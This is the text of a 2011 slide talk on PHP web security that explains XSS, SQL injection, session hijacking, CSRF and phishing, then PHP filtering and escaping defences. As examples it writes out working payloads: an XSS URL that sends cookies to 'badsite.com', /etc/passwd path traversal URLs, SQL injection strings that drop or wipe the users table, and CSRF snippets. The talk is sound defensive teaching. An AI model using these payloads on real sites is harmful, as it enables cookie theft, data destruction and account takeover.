Security and PHP

February 2011

Allan Shone

Technical Yahoo!, Local Paranoid @Yahoo!7

Been at Yahoo!7 just under 3 years

allan.shone@yahoo.com

Website Security

February 2011

What is Security?

Why is Security important?

What can you do about it?

Types of issues

XSS

SQL Injection

Session Hijacking

CSRF

Phishing

Why XSS?

February 2011

Lead to larger problems

Used to inject code into your site

Bad people ™ can steal user information

http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ealert%280%29;%3C/script%3E

http://sydphp.leetbix.com/template.php?load=%3Cscript%3Edocument.location=%27http://badsite.com%27%3C/script%3E

http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ea%3Ddocument.createElement(%22img%22)%3Ba.src%3D%22http%3A%2F%2Fbadsite.com%2F%3F%22%2Bdocument.cookie%3Bdocument.firstChild.appendChild(a)%3B%3C%2Fscript%3E

February 2011

February 2011

http://sydphp.leetbix.com/template.php?load=/etc/passwd%00

http://sydphp.leetbix.com/template.php?load=../some-config.conf%00

February 2011

POST too

February 2011

What do I do?!

February 2011

Filter

Simplest solution: htmlentities()

February 2011

SQL what?

February 2011

Arbitrary SQL code being executed

Bypass login, edit database content

Find passwords, hidden information

http://sydphp.leetbix.com/login.php

Password: ‘ OR 1=1 -- ‘

‘ OR 1=1; DROP TABLE users; -- ‘

‘ OR 1=1; UPDATE TABLE users SET password=‘’ WHERE 1=1; -- ‘

February 2011

Oh no!

February 2011

http://xkcd.com/327/

February 2011

escape

February 2011

mysql_real_escape_string()

addslashes()

PDO

PDO::quote()

Session hijacking

February 2011

Bad for users

Bad for data integrity

Easy to prevent

Not stand-alone

February 2011

Cookies

February 2011

Integrity checking

February 2011

CSRF? Sugar?

February 2011

Cross-site request forgery

February 2011

Simple, but un-common

February 2011

<img src=“http://othersite.com/changepasswd?new=onlyIKnow” />

<script>a=document.createElement(‘img’);a.src=‘http://badsite../’;document.firstChild.appendChild(a);a.src=‘http://badsite.com/otherpage’;</script>

February 2011

Integrity, integrity

February 2011

Phishing!

February 2011

Same, but different?

February 2011

But what can you do

February 2011

PHP’s filter functions

February 2011

filter_has_var

filter_id

filter_input_array

filter_input

filter_list

filter_var_array

filter_var

No more SuperGlobals

February 2011

$search = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);

echo ”<h3>No results found for ‘{$search}’.</h3>";

echo "<a href='?search=$search&page=2'>Next page</a>";

February 2011

INPUT_GET

INPUT_POST

INPUT_COOKIE

INPUT_SERVER

INPUT_ENV

February 2011

Twitter

Allan Shone - @cerealboyJared Mooring - @jadzor

Filter function filters: http://au2.php.net/manual/en/filter.filters.php

February 2011